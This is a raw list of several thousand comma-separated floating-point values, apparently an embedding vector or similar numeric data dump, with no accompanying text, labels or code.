0.01722605526447296, -0.014380932785570621, 0.037021901458501816, 0.027279295027256012, -0.0012275329791009426, 0.00691160187125206, -0.004038239363580942, 0.04193556308746338, 0.030639788135886192, 0.016873063519597054, 0.004712455905973911, -0.009961460717022419, -0.008027059957385063, -0.003794674063101411, -0.02338225208222866, 0.008408292196691036, -0.014084418304264545, 0.033633168786764145, -0.014613907784223557, -0.006477420683950186, 0.007928221486508846, 0.03448035195469856, 0.0014225615886971354, 0.040212955325841904, 0.027293413877487183, 0.04687746241688728, -0.012538309209048748, 0.030413871631026268, -0.008132957853376865, 0.019245175644755363, -0.01904749870300293, 0.00728577421978116, 0.03829267621040344, 0.029764365404844284, -0.02677098475396633, -0.01242535188794136, -0.011027500033378601, 0.014260915108025074, -0.013964400626718998, -0.026573309674859047, -0.03868802636861801, 0.0007209880859591067, 0.007681126240640879, -0.00002146914084732998, -0.0058349734172225, -0.030724504962563515, 0.010229735635221004, -0.0028521830681711435, -0.02805587835609913, -0.04970140755176544, -0.02568376623094082, 0.05532105267047882, -0.05498218163847923, 0.018694506958127022, 0.021532569080591202, 0.007589348126202822, -0.014896302483975887, -0.025994399562478065, -0.029227815568447113, 0.006032649427652359, -0.023269295692443848, -0.010886302217841148, -0.003014559857547283, 0.008676566183567047, 0.021673766896128654, -0.0381232388317585, -0.02089718170464039, 0.022167956456542015, -0.016957780346274376, -0.03323781490325928, -0.005061918869614601, -0.003794674063101411, 0.03193880245089531, -0.036400631070137024, -0.034056760370731354, 0.008147076703608036, -0.010533309541642666, 0.0031998809427022934, 0.02101013995707035, -0.0032457702327519655, -0.007829383946955204, 0.014882182702422142, 0.042669788002967834, -0.03329429402947426, 0.006650386843830347, 0.026926301419734955, 0.009227235801517963, -0.024215316399931908, -0.02002175897359848, 0.00814001727849245, -0.004737165290862322, 0.02249271050095558, -0.02240799181163311, 0.014437410980463028, 0.003777024568989873, 0.012044119648635387, 0.042585067451000214, -0.0037911441177129745, -0.01581408455967903, -0.009403731673955917, -0.029425492510199547, 0.03100690059363842, 0.0045041898265480995, 0.01855330914258957, 0.015178696252405643, -0.030809223651885986, -0.0324188731610775, 0.017776723951101303, 0.005534929223358631, 0.045973800122737885, -0.009460210800170898, -0.012022939510643482, -0.011062799021601677, -0.021829083561897278, -0.0055313995108008385, 0.013660826720297337, -0.0015708185965195298, -0.008048239164054394, -0.014458591118454933, 0.02050182968378067, 0.023029260337352753, 0.018976900726556778, 0.004232385195791721, -0.036400631070137024, -0.00558434845879674, 0.03682422265410423, -0.013385492376983166, 0.0022079709451645613, -0.012037059292197227, -0.004465360660105944, 0.03055506944656372, 0.002926311455667019, 0.017550809308886528, 0.022478589788079262, 0.0068657128140330315, -0.015065738931298256, 0.027406372129917145, 0.00884600356221199, 0.014642147347331047, 0.002688041189685464, 0.03529929369688034, 0.061223097145557404, -0.027815844863653183, -0.027942921966314316, -0.034508589655160904, -0.02140549197793007, -0.008881302550435066, -0.016025880351662636, 0.010582728311419487, -0.0361747182905674, -0.028719505295157433, -0.027067499235272408, -0.01961228810250759, 0.03191056102514267, -0.013293714262545109, 0.00004961205559084192, 0.041766125708818436, 0.031232815235853195, 0.012234735302627087, -0.016322392970323563, 0.002945726038888097, 0.002121487632393837, -0.01996528171002865, 0.04052358865737915, -0.016986019909381866, 0.017748484387993813, 0.014162076637148857, 0.011211056262254715, -0.0012028234777972102, -0.00013656415103469044, -0.004867772571742535, 0.024215316399931908, -0.00316811166703701, 0.0020332394633442163, 0.026008520275354385, 0.009622587822377682, 0.04357345029711723, 0.017748484387993813, 0.011098098009824753, -0.005940871313214302, 0.025584928691387177, 0.0073422533459961414, -0.009008379653096199, -0.004302984103560448, -0.017296655103564262, -0.004825413692742586, -0.01908985897898674, 0.006067948881536722, 0.011556988582015038, 0.035553447902202606, 0.01572936587035656, 0.01623767614364624, 0.027759365737438202, 0.007370492909103632, -0.024596547707915306, 0.016491830348968506, -0.028705386444926262, 0.014910422265529633, -0.006523309741169214, -0.020784225314855576, 0.014628027565777302, 0.018256794661283493, 0.014599788002669811, 0.007695246022194624, -0.012107658199965954, 0.0051466370932757854, -0.056478872895240784, -0.02242211252450943, -0.014783344231545925, -0.0180873591452837, -0.003872332628816366, 0.002036769175902009, -0.007306953892111778, 0.011154577136039734, -0.011069858446717262, -0.01668950729072094, -0.00909309834241867, 0.0005140459979884326, -0.023692887276411057, -0.00618443638086319, -0.022986900061368942, -0.01811559870839119, -0.0016308274352923036, -0.020148837938904762, -0.012721865437924862, 0.010681566782295704, 0.00618443638086319, -0.026036759838461876, 0.022690385580062866, -0.0195840485394001, -0.002465655794367194, -0.012693625874817371, -0.03586408495903015, 0.02486482262611389, -0.0018037939444184303, 0.005552579183131456, 0.0071763466112315655, -0.011592288501560688, -0.025500210002064705, 0.001810853835195303, 0.00835887249559164, -0.02381996437907219, 0.023156337440013885, -0.016110597178339958, -0.013752604834735394, -0.016915421932935715, -0.021800843998789787, -0.016590667888522148, 0.04247211292386055, -0.006925721652805805, 0.007822323590517044, -0.014585668221116066, 0.015122218057513237, 0.0011666417121887207, 0.00773760536685586, -0.024695387110114098, -0.04018471762537956, 0.0023968222085386515, -0.019880563020706177, -0.008323573507368565, -0.028324153274297714, 0.000029508004445233382, 0.005256065167486668, 0.011479330249130726, -0.0026862763334065676, 0.012446531094610691, -0.009580228477716446, 0.03134577348828316, 0.020628906786441803, -0.0006093540578149259, 0.00929077435284853, -0.0017049559392035007, 0.022746864706277847, -0.010603908449411392, -0.028352392837405205, -0.031119858846068382, 0.018369752913713455, 0.010533309541642666, -0.007434031460434198, -0.009707305580377579, -0.005047799088060856, 0.011549929156899452, -0.024568308144807816, -0.007970580831170082, 0.03905513882637024, 0.01499514002352953, -0.03529929369688034, 0.014380932785570621, 0.021094858646392822, -0.01907573826611042, -0.0005546401371248066, 0.0014763929648324847, -0.0016228851163759828, 0.03148696944117546, -0.0004955138429068029, 0.012792464345693588, -0.005478450562804937, -0.01454330887645483, 0.005944401025772095, -0.005785554181784391, 0.0062232655473053455, -0.003446976188570261, 0.0037734946236014366, 0.015912922099232674, -0.022690385580062866, 0.018468590453267097, 0.023650527000427246, -0.0136184673756361, 0.001957345986738801, 0.0219844002276659, 0.015093978494405746, -0.023509329184889793, 0.014642147347331047, 0.0005113985389471054, -0.006890422198921442, -0.011211056262254715, -0.020191196352243423, -0.02280334383249283, -0.02616383694112301, 0.034056760370731354, -0.0019432262051850557, 0.02199852094054222, -0.022690385580062866, 0.01804499886929989, 0.0015266945119947195, -0.018030880019068718, 0.03352021053433418, 0.00030820697429589927, -0.013463150709867477, -0.029792604967951775, -0.026883943006396294, -0.0007986465352587402, 0.008041179738938808, -0.03922457620501518, 0.028973661363124847, 0.038885701447725296, -0.01021561585366726, 0.007299894001334906, -0.031684648245573044, -0.018680386245250702, -0.021673766896128654, -0.006039709318429232, 0.004419471602886915, -0.020854823291301727, 0.021617287769913673, -0.005852622911334038, 0.013710246421396732, -0.034169718623161316, 0.020388873293995857, -0.008690685965120792, -0.015164576470851898, -0.039817605167627335, 0.0006428884225897491, -0.018412111327052116, -0.01379496417939663, 0.020177077502012253, 0.0342261977493763, 0.009382552467286587, 0.009728485718369484, 0.009827323257923126, -0.010024999268352985, -0.0005744959926232696, 0.006946901325136423, 0.010505069978535175, 0.002620972692966461, 0.03154344856739044, -0.014868062920868397, -0.0013007790548726916, 0.013477270491421223, -0.0036464170552790165, 0.009213116019964218, -0.05421971529722214, -0.0037593748420476913, -0.012135897763073444, -0.0031116327736526728, 0.010286214761435986, -0.0253590140491724, -0.02996204048395157, 0.014063239097595215, 0.006473890505731106, -0.0001832254056353122, -0.03298366069793701, 0.003787614405155182, -0.006858652923256159, -0.017889682203531265, -0.009799083694815636, 0.004603027831763029, -0.03817971795797348, 0.00835887249559164, -0.012178256176412106, 0.016816584393382072, 0.04738577455282211, -0.001614060252904892, 0.03202351927757263, 0.023509329184889793, -0.021193696185946465, -0.012157076969742775, -0.026079118251800537, 0.003236945252865553, -0.018016759306192398, -0.03154344856739044, -0.012926601804792881, -0.0012875418178737164, 0.04899542033672333, -0.00488542253151536, -0.009220175445079803, -0.02147608995437622, 0.004768934566527605, -0.03049859032034874, -0.010448590852320194, -0.017861442640423775, 0.009848503395915031, -0.01262302789837122, 0.03959168866276741, -0.01003911904990673, 0.00031173689058050513, 0.022097358480095863, -0.022280914708971977, -0.008775404654443264, -0.00835887249559164, 0.0036781865637749434, 0.004740695469081402, -0.0162800345569849, -0.03538401424884796, -0.021560808643698692, -0.002938666148111224, 0.032729506492614746, -0.01955580897629261, -0.008973080664873123, 0.022266795858740807, 0.01910397782921791, -0.019838202744722366, -0.01242535188794136, 0.0171836968511343, -0.04348872974514961, -0.02571200579404831, -0.0004941901424899697, -0.005506690125912428, -0.006643327418714762, 0.007377552334219217, -0.01904749870300293, -0.0026951010804623365, -0.0281405970454216, 0.03199528157711029, 0.0003651270817499608, 0.0038970420137047768, -0.003992350306361914, 0.0015081623569130898, -0.006992790382355452, 0.006304454058408737, -0.037473730742931366, 0.012227675877511501, -0.04004351794719696, -0.019838202744722366, -0.032136477530002594, 0.002951021073386073, 0.026474470272660255, 0.021363133564591408, -0.03753020986914635, 0.030300915241241455, 0.02236563339829445, -0.028691265732049942, -0.010681566782295704, 0.004373582545667887, 0.0030780984088778496, -0.030159717425704002, 0.03611823916435242, -0.009424911811947823, 0.01860978826880455, -0.013660826720297337, 0.028804223984479904, 0.01289836224168539, 0.0049842605367302895, -0.007441091351211071, -0.004684216342866421, -0.010829823091626167, 0.017353132367134094, -0.03532753512263298, 0.003319898620247841, 0.050746265798807144, -0.0015972930705174804, 0.01004617940634489, -0.016915421932935715, -0.02295866049826145, -0.05325957387685776, 0.02770288661122322, 0.018779223784804344, 0.003300484037026763, -0.025923801586031914, 0.02390468306839466, 0.020304154604673386, 0.00535843288525939, -0.009488450363278389, -0.0354122519493103, -0.026446230709552765, -0.009213116019964218, 0.044590067118406296, -0.005623177625238895, 0.008323573507368565, 0.015192816033959389, -0.02240799181163311, 0.016392992809414864, 0.02095366083085537, 0.03668302670121193, -0.04357345029711723, -0.017367253080010414, -0.03185408189892769, -0.013830263167619705, 0.005492570344358683, 0.007335193455219269, -0.0016272974899038672, 0.003374612657353282, 0.026107357814908028, 0.0006159726763144135, -0.0021179576870054007, 0.0021779665257781744, -0.00560905784368515, 0.003000440075993538, 0.004430061671882868, -0.04617147892713547, 0.0059126317501068115, -0.004002939909696579, -0.042246196419000626, 0.022732745856046677, 0.04947549104690552, 0.010335633531212807, -0.0007699658744968474, -0.004387702327221632, -0.005379612557590008, 0.01959816738963127, 0.008443591184914112, 0.003942931070923805, 0.0027868791949003935, -0.0038758625742048025, 0.006219735834747553, -0.012241795659065247, 0.042161475867033005, -0.03191056102514267, 0.007899981923401356, -0.006392701994627714, 0.007356373127549887, -0.04874126613140106, 0.013110158033668995, 0.023763485252857208, -0.001562876277603209, -0.020643027499318123, 0.0023668177891522646, 0.00726459501311183, -0.011966460384428501, -0.030668027698993683, 0.0006084715714678168, 0.009672006592154503, -0.001056331442669034, 0.01570112630724907, -0.0204877108335495, 0.017776723951101303, -0.008274154737591743, 0.00811883807182312, -0.00022580516815651208, -0.010865123011171818, -0.004959550686180592, -0.011041618883609772, 0.005090158432722092, 0.00585968280211091, 0.00596205098554492, -0.007271654438227415, -0.01410559844225645, 0.004394762217998505, -0.024991899728775024, 0.022506829351186752, -0.013964400626718998, -0.02246447093784809, 0.00015641999198123813, -0.028041759505867958, -0.014628027565777302, -0.006745695136487484, -0.044618308544158936, 0.023043379187583923, 0.0006561256595887244, -0.011606408283114433, 0.02534489333629608, 0.09420675784349442, -0.003476980607956648, -0.007314013782888651, -0.003724075620993972, -0.01908985897898674, -0.0018161487532779574, -0.002659801859408617, -0.0074834502302110195, 0.029820844531059265, -0.001043976633809507, 0.0030569189693778753, 0.021758485585451126, 0.0162800345569849, 0.03298366069793701, 0.029905561357736588, 0.005252534989267588, -0.0037805545143783092, -0.02199852094054222, 0.025655526667833328, -0.026417991146445274, 0.02044535055756569, 0.006830413360148668, 0.014395052567124367, -0.003639357164502144, 0.02246447093784809, -0.010858062654733658, -0.01522105559706688, -0.01766376756131649, -0.04337577149271965, 0.006477420683950186, 0.020162956789135933, 0.013999700546264648, -0.015616407617926598, -0.014310333877801895, -0.0083659328520298, 0.012601847760379314, -0.0055137500166893005, 0.0016396521823480725, -0.010618028230965137, -0.02095366083085537, -0.018934542313218117, 0.0012981315376237035, -0.019866442307829857, 0.008408292196691036, -0.012044119648635387, -0.010427411645650864, -0.007314013782888651, 0.015658767893910408, -0.016392992809414864, 0.009022499434649944, -0.02188556268811226, -0.007497570011764765, 0.001727017923258245, -0.003632297506555915, 0.006170316599309444, -0.011571108363568783, -0.005820853635668755, 0.003978230524808168, -0.016378872096538544, 0.004903072025626898, 0.010730985552072525, -0.0006305336719378829, -0.022125598043203354, 0.010095598176121712, -0.009912041947245598, 0.009961460717022419, -0.03569464758038521, 0.009926161728799343, -0.02246447093784809, 0.016110597178339958, 0.016336513683199883, 0.003012794768437743, -0.016491830348968506, 0.00510427774861455, -0.011281654238700867, -0.020332394167780876, -0.005817323923110962, 0.004712455905973911, -0.004585378337651491, -0.012764224782586098, -0.0017234880942851305, 0.005111337639391422, -0.0006980435573495924, 0.021320773288607597, -0.004715985618531704, 0.037389013916254044, -0.028747744858264923, -0.0035881733056157827, 0.01574348472058773, -0.007674066815525293, -0.010180316865444183, 0.011775844730436802, 0.01900514028966427, 0.00256625865586102, 0.015192816033959389, 0.03044211119413376, 0.02526017464697361, -0.017423732206225395, -0.01959816738963127, -0.026460351422429085, 0.026375632733106613, 0.001863802783191204, -0.010081478394567966, -0.007151637226343155, -0.009297833777964115, -0.008796583861112595, 0.022760985419154167, -0.012961900793015957, -0.020134717226028442, 0.008330633863806725, -0.01625179499387741, 0.009707305580377579, 0.013929101638495922, -0.014726866036653519, -0.0060785384848713875, 0.0033269585110247135, -0.0033499030396342278, -0.012545369565486908, -0.016477711498737335, -0.025189576670527458, -0.018299154937267303, 0.001271657063625753, 0.029369013383984566, -0.041681405156850815, 0.013526689261198044, 0.009933221153914928, 0.020643027499318123, -0.01767788641154766, 0.022224435582756996, 0.006131487432867289, 0.010222675278782845, 0.010575668886303902, 0.016336513683199883, -0.013103097677230835, 0.01146521046757698, -0.015955280512571335, 0.03103514015674591, 0.030244436115026474, -0.004991320427507162, 0.012022939510643482, 0.011768784373998642, 0.013992640189826488, -0.017748484387993813, 0.006572728510946035, -0.00013402701006270945, 0.008966021239757538, 0.0162800345569849, 0.0006764227291569114, 0.015122218057513237, 0.008662446402013302, 0.0013501980574801564, -0.02903014048933983, 0.017494330182671547, 0.026996901258826256, -0.007243415340781212, -0.03767140582203865, -0.0033569629304111004, 0.005407852120697498, 0.012220615521073341, 0.002815118758007884, -0.0133219538256526, 0.00310633797198534, 0.001118105137720704, -0.009220175445079803, -0.012474770657718182, 0.006399761885404587, -0.010766284540295601, -0.006166786886751652, -0.00907191913574934, 0.0013281359570100904, 0.019626406952738762, 0.0012795993825420737, -0.030837463214993477, 0.0025186047423630953, 0.01855330914258957, 0.022238556295633316, 0.014366813004016876, -0.014726866036653519, 0.027321653440594673, 0.007049269042909145, 0.0007536399643868208, 0.0036464170552790165, 0.01626591570675373, -0.0030269145499914885, -0.009149577468633652, -0.012707745656371117, -0.000025123170416918583, -0.005340783391147852, -0.04665154591202736, 0.0038652727380394936, 0.00478305434808135, 0.032249435782432556, -0.018849823623895645, -0.023692887276411057, -0.00605735881254077, -0.026601547375321388, -0.014056178741157055, -0.017381371930241585, -0.002650977112352848, -0.004352402873337269, -0.011782904155552387, -0.0005400791997089982, 0.01356904860585928, 0.006233855616301298, 0.005686716176569462, -0.0390269011259079, -0.009827323257923126, 0.0049630808643996716, 0.018878063187003136, 0.0007787906797602773, -0.0023844672832638025, -0.022760985419154167, 0.010575668886303902, -0.003372847568243742, 0.009883802384138107, 0.005372552666813135, -0.01711309887468815, -0.01625179499387741, 0.004864242859184742, 0.0019820553716272116, 0.00036689205444417894, 0.012135897763073444, -0.0009274889598600566, 0.02374936453998089, -0.014642147347331047, 0.004804234020411968, 0.01949932985007763, -0.02761816792190075, -0.011140457354485989, 0.0015125747304409742, -0.02479422464966774, 0.018878063187003136, -0.005270184483379126, 0.01073804497718811, -0.008605968207120895, -0.009417851455509663, -0.006399761885404587, -0.009446091018617153, 0.012961900793015957, 0.015291654504835606, 0.010907482355833054, -0.0021814964711666107, 0.0029104268178343773, -0.029820844531059265, 0.010851003229618073, -0.00020848645363003016, 0.016562428325414658, 0.009629647247493267, -0.01910397782921791, 0.000393145892303437, 0.002266214694827795, 0.01804499886929989, 0.01051918976008892, -0.02147608995437622, -0.008697746321558952, 0.02101013995707035, -0.01622355543076992, -0.026954540982842445, -0.0030904533341526985, -0.034028518944978714, 0.030329152941703796, -0.019372252747416496, -0.014317394234240055, 0.023565808311104774, -0.025599047541618347, 0.0011551694478839636, -0.02232327312231064, -0.005774964578449726, -0.009721425361931324, 0.004617147613316774, 0.002658036770299077, 0.005316073540598154, -0.005326663609594107, 0.006075008772313595, -0.018468590453267097, -0.0017817318439483643, 0.00510427774861455, 0.006632737349718809, 0.005947931203991175, -0.0029033669270575047, -0.002806294010952115, 0.04475950449705124, 0.0060608889907598495, -0.01663302816450596, 0.006375052500516176, 0.005083098541945219, -0.04012823849916458, -0.01856742799282074, -0.013230175711214542, -0.0020138246472924948, 0.0014181490987539291, -0.016788344830274582, 0.014500950463116169, -0.03829267621040344, 0.00884600356221199, -0.014952780678868294, -0.020671267062425613, 0.0248365830630064, 0.013632587157189846, -0.0013325483305379748, -0.0018443880835548043, 0.02533077448606491, 0.013237235136330128, 0.0013122513191774487, -0.018355632200837135, -0.01663302816450596, -0.032164718955755234, -0.004444180987775326, 0.028691265732049942, 0.0006587730604223907, -0.012820703908801079, -0.01096396055072546, -0.04523957520723343, -0.0052172355353832245, 0.015263414941728115, -0.028324153274297714, -0.020233554765582085, 0.011521689593791962, -0.010632147081196308, 0.011811143718659878, 0.0015690536238253117, 0.0019220465328544378, -0.010250914841890335, -0.026064999401569366, -0.008380052633583546, -0.010582728311419487, -0.014613907784223557, -0.0021956160198897123, -0.023029260337352753, 0.0004266802279744297, 0.024144716560840607, 0.004860712680965662, 0.0427827462553978, -0.008231795392930508, -0.017480211332440376, 0.0037311355117708445, 0.0009689656435512006, -0.010201496072113514, -0.0034434462431818247, 0.006706865970045328, -0.012827763333916664, 0.0427827462553978, -0.007441091351211071, -0.011316954158246517, 0.01863802783191204, 0.008351813070476055, -0.0036570068914443254, 0.0015690536238253117, -0.012757165357470512, -0.006639797240495682, -0.025641407817602158, -0.0000029094339879520703, 0.0029669057112187147, 0.0011966461315751076, 0.009947340935468674, 0.041737884283065796, -0.005552579183131456, 0.007398732006549835, 0.019273415207862854, -0.021730246022343636, -0.010907482355833054, -0.005051329266279936, 0.006279744673520327, 0.006622147746384144, 0.013300773687660694, -0.03919633477926254, -0.0013987345155328512, 0.0022415053099393845, 0.009001320227980614, 0.0007584936101920903, 0.013060739263892174, -0.017960280179977417, 0.002077363431453705, 0.0005753784789703786, 0.013272535055875778, -0.0001284011814277619, 0.017932042479515076, -0.0447312667965889, -0.02716633677482605, 0.013653767295181751, -0.011295774020254612, -0.0008348283008672297, 0.016943661496043205, -0.016562428325414658, 0.008980140089988708, -0.003907632082700729, -0.031204575672745705, 0.0045041898265480995, -0.033124856650829315, -0.014013820327818394, 0.0025750836357474327, 0.033096618950366974, 0.0031416371930390596, 0.016873063519597054, 0.025471970438957214, -0.015206935815513134, 0.0017852617893368006, 0.003251065034419298, 0.005764374975115061, 0.007928221486508846, -0.008570668287575245, -0.027335774153470993, 0.006597438361495733, 0.018821584060788155, -0.000589498202316463, 0.0024374162312597036, -0.029453732073307037, -0.019245175644755363, 0.03343548998236656, -0.003964110743254423, 0.009975580498576164, -0.005354903172701597, -0.012735985219478607, -0.012566548772156239, -0.029792604967951775, -0.03182584419846535, 0.013484330847859383, 0.037869084626436234, 0.011175756342709064, -0.010152077302336693, 0.007109277881681919, -0.01757904887199402, -0.026488590985536575, -0.023297535255551338, -0.0046524470672011375, -0.006964550819247961, -0.01762140728533268, 0.006145607214421034, -0.0069398414343595505, 0.018397992476820946, -0.011288714595139027, 0.006925721652805805, 0.00618443638086319, -0.012065298855304718, 0.024243555963039398, 0.003416971769183874, -0.0037311355117708445, -0.0013237235834822059, 0.00014461680257227272, 0.012601847760379314, 0.0006843650480732322, 0.003939401358366013, 0.019781725481152534, -0.012086478061974049, 0.0054572708904743195, 0.02051595039665699, -0.007659947033971548, -0.00004147667277720757, -0.01620943658053875, -0.019202815368771553, 0.02956668846309185, 0.0006442121230065823, 0.029707886278629303, 0.018765104934573174, 0.009672006592154503, -0.005143107380717993, 0.01122517604380846, 0.017395492643117905, -0.002859242958948016, 0.0006124427309259772, 0.011062799021601677, -0.010625087656080723, 0.006424471735954285, -0.005683186464011669, 0.015319894067943096, 0.003281069453805685, 0.012241795659065247, -0.01452919002622366, -0.009530809707939625, 0.008387112058699131, -0.0008405644330196083, -0.000009397058420290705, 0.0014878652291372418, -0.006802174262702465, 0.01379496417939663, -0.003402851987630129, -0.013159576803445816, -0.01527753472328186, -0.010978080332279205, 0.01454330887645483, 0.02089718170464039, 0.02953844889998436, 0.00304279918782413, -0.027787605300545692, -0.009643767029047012, -0.0059832301922142506, -0.0004460948402993381, -0.012601847760379314, 0.01003911904990673, 0.009142517112195492, -0.018285034224390984, -0.01860978826880455, -0.014225616119801998, 0.01258772797882557, 0.004087658133357763, 0.013639647513628006, 0.008937781676650047, 0.018835702911019325, 0.011606408283114433, 0.017748484387993813, -0.001035151770338416, -0.001923811505548656, -0.018948661163449287, 0.005118397530168295, -0.006798644084483385, -0.0023368133697658777, -0.02146197110414505, 0.02060066908597946, -0.004941901192069054, -0.019315773621201515, 0.007222235668450594, -0.01668950729072094, 0.0026086177676916122, -0.00538667244836688, 0.018030880019068718, 0.017776723951101303, 0.00208971812389791, 0.00067333405604586, -0.016025880351662636, 0.01499514002352953, -0.0046736267395317554, -0.006703335791826248, 0.005552579183131456, -0.02422943525016308, -0.007907042279839516, 0.004200615920126438, 0.0038935120683163404, -0.02534489333629608, -0.016463590785861015, -0.019231054931879044, -0.006089128088206053, 0.006046769209206104, -0.007525809574872255, -0.01997940056025982, 0.002815118758007884, 0.0032122358679771423, 0.022040879353880882, -0.006276214495301247, 0.022280914708971977, -0.009664947167038918, -0.006759814918041229, -0.009862623177468777, -0.00020120598492212594, 0.009326073341071606, 0.006752755027264357, -0.019654646515846252, 0.005594938062131405, -0.008683626540005207, -0.02435651235282421, 0.0017614348325878382, 0.00977084506303072, -0.0059126317501068115, 0.002876892453059554, -0.002432121429592371, -0.006893952377140522, -0.014218555763363838, -0.009114277549088001, -0.014013820327818394, 0.0010519189527258277, 0.00953786913305521, -0.0002189659426221624, 0.030696267262101173, 0.028521830216050148, 0.023650527000427246, 0.007546989247202873, 0.021532569080591202, 0.001396969542838633, -0.015108098275959492, 0.009700246155261993, -0.016463590785861015, 0.003062213771045208, -0.00974260549992323, -0.01379496417939663, 0.013554928824305534, 0.008669506758451462, 0.001138402265496552, 0.003436386352404952, -0.0030780984088778496, -0.02187144197523594, 0.014034999534487724, 0.00028813048265874386, 0.028465351089835167, -0.009707305580377579, -0.018327394500374794, -0.0039747003465890884, -0.01769200712442398, 0.016110597178339958, 0.0018567428924143314, -0.03275774419307709, -0.019739365205168724, 0.011147516779601574, 0.0015478740679100156, -0.023015139624476433, 0.014966900460422039, -0.0095661086961627, -0.007575228810310364, -0.02905838005244732, 0.0027992341201752424, -0.005213705822825432, 0.013738485053181648, 0.0021709066350013018, 0.005573758389800787, 0.013660826720297337, -0.009403731673955917, -0.009679066948592663, -0.02297278121113777, 0.011754664592444897, -0.020148837938904762, -0.01312427781522274, -0.004797174129635096, 0.005471390672028065, -0.0020420642103999853, -0.002626267494633794, 0.00428180443122983, -0.020713625475764275, -0.01309603825211525, -0.005354903172701597, 0.006639797240495682, -0.0030975129920989275, -0.02630503475666046, 0.0006645091925747693, -0.009008379653096199, 0.0048148236237466335, -0.012940721586346626, 0.009799083694815636, 0.009340193122625351, -0.012933661229908466, -0.008987200446426868, -0.008528309874236584, 0.01093572098761797, 0.0012266504345461726, -0.002770994557067752, 0.006946901325136423, -0.014670386910438538, -0.017960280179977417, 0.02239387296140194, -0.0022626847494393587, -0.005884392186999321, -0.009241355583071709, -0.006650386843830347, -0.007984700612723827, 0.008302394300699234, -0.027378132566809654, -0.01452919002622366, -0.011839383281767368, 0.018242675811052322, 0.012552428990602493, 0.0022520949132740498, 0.0027056909166276455, 0.02050182968378067, -0.0033887322060763836, -0.0031310473568737507, -0.016435351222753525, -0.009403731673955917, -0.007052799221128225, -0.0028504179790616035, -0.015955280512571335, 0.0005890569882467389, 0.00012420938583090901, 0.01911809854209423, 0.02232327312231064, 0.015122218057513237, -0.02187144197523594, 0.017268415540456772, 0.0041053080931305885, -0.014169136993587017, -0.02143373154103756, 0.012079418636858463, 0.005905571859329939, 0.016350632533431053, 0.011677006259560585, -0.008507129736244678, -0.016548309475183487, -0.01026503462344408, -0.004680686630308628, -0.003939401358366013, 0.02004999853670597, 0.017324892804026604, 0.0013219586107879877, 0.017324892804026604, -0.01236887276172638, -0.006943371146917343, -0.01242535188794136, 0.006978670600801706, -0.006103247869759798, 0.012488890439271927, 0.0014622732996940613, -0.008831883780658245, 0.0027251054998487234, -0.014260915108025074, 0.006978670600801706, 0.00022315772366710007, 0.03383084386587143, -0.02911485731601715, -0.011782904155552387, -0.035553447902202606, 0.005167816765606403, 0.019301654770970345, -0.0024162367917597294, 0.02678510546684265, -0.0007042209035716951, 0.005026619415730238, -0.0012584198266267776, -0.003485805355012417, 0.0046524470672011375, 0.008994259871542454, 0.011147516779601574, 0.003176936414092779, 0.020134717226028442, 0.0033587277866899967, 0.01568700559437275, -0.0022009110543876886, 0.013187816366553307, 0.008704805746674538, -0.005700835958123207, 0.01027209497988224, -0.01762140728533268, 0.01119693648070097, 0.02571200579404831, -0.0006521544419229031, -0.027519330382347107, -0.010116777382791042, -0.009608468040823936, -0.014910422265529633, 0.012029999867081642, 0.0013819673331454396, 0.030131477862596512, -0.010088538751006126, -0.0224362313747406, -0.008514190092682838, 0.010067358613014221, 0.0006817176472395658, 0.03953520953655243, -0.013477270491421223, -0.00002203448093496263, -0.007377552334219217, 0.01769200712442398, -0.04348872974514961, 0.010095598176121712, -0.01452919002622366, 0.01622355543076992, -0.007525809574872255, -0.012750105001032352, -0.009559049271047115, 0.013540809042751789, 0.008867182768881321, 0.0020861884113401175, 0.00463126739487052, 0.007306953892111778, 0.019937042146921158, 0.00017340778140351176, 0.03464978560805321, -0.012997199781239033, -0.012806584127247334, 0.035525210201740265, -0.014952780678868294, -0.012707745656371117, 0.009163697250187397, 0.0033181337639689445, 0.004701865836977959, 0.007328133564442396, 0.01858154870569706, 0.011500510387122631, 0.017268415540456772, 0.0045818486250936985, 0.0065550790168344975, -0.0021073678508400917, 0.009340193122625351, -0.02149021066725254, -0.015489330515265465, -0.013872622512280941, 0.02815471775829792, 0.013907922431826591, 0.004447711165994406, 0.017522569745779037, 0.015291654504835606, 0.0038370334077626467, -0.017070738598704338, -0.002149726962670684, -0.0017631998052820563, -0.022760985419154167, -0.015489330515265465, -0.013399612158536911, 0.02096778154373169, 0.02716633677482605, -0.019654646515846252, -0.00681276386603713, -0.0004438886244315654, 0.04049535095691681, -0.014380932785570621, -0.00339226215146482, -0.005400792229920626, 0.008711866103112698, -0.008937781676650047, -0.018397992476820946, -0.004553609061986208, 0.003981760237365961, -0.007257535122334957, 0.0022820993326604366, 0.004899541847407818, -0.004483010619878769, -0.04103190079331398, -0.00510427774861455, -0.0016855413559824228, 0.017324892804026604, 0.009890862740576267, -0.0005008087609894574, -0.0027568750083446503, -0.009008379653096199, 0.0016820114105939865, -0.015983520075678825, 0.00415825704112649, -0.014656267128884792, 0.016957780346274376, -0.010596848092973232, 0.021207816898822784, -0.010152077302336693, 0.009220175445079803, 0.024907182902097702, 0.012820703908801079, 0.007914101704955101, -0.015418731607496738, 0.026064999401569366, 0.002658036770299077, 0.011500510387122631, -0.008076478727161884, -0.01021561585366726, -0.03623119741678238, 0.010533309541642666, -0.02089718170464039, 0.002949255984276533, -0.005633767228573561, 0.0024232964497059584, -0.02568376623094082, -0.039394013583660126, -0.025429612025618553, -0.01948521099984646, -0.0036146477796137333, 0.01623767614364624, 0.02004999853670597, -0.007878802716732025, -0.015348133631050587, 0.00831651408225298, 0.004355933051556349, -0.015432851389050484, -0.025161337107419968, -0.00738461222499609, -0.004804234020411968, -0.0001520075893495232, -0.025556689128279686, 0.011394612491130829, -0.02053006924688816, -0.003674656618386507, 0.010547429323196411, 0.023523449897766113, 0.0006786289159208536, -0.004483010619878769, -0.01522105559706688, -0.019640527665615082, 0.012354752980172634, -0.0031575218308717012, 0.017861442640423775, 0.021560808643698692, 0.0036252376157790422, -0.01574348472058773, -0.014225616119801998, -0.006406821776181459, -0.007942341268062592, 0.011867622844874859, -0.004680686630308628, 0.024596547707915306, -0.0031292825005948544, -0.009417851455509663, 0.011324013583362103, 0.011542869731783867, -0.004701865836977959, 0.00909309834241867, -0.014437410980463028, -0.021221935749053955, -0.0037629047874361277, 0.019301654770970345, -0.004712455905973911, -0.018835702911019325, 0.008556549437344074, -0.001116340165026486, 0.0007682009018026292, 0.0043418132700026035, 0.008761284872889519, -0.005139577202498913, 0.004274744540452957, -0.009679066948592663, 0.017000140622258186, -0.019344013184309006, 0.02338225208222866, 0.03301189839839935, -0.0007006910163909197, 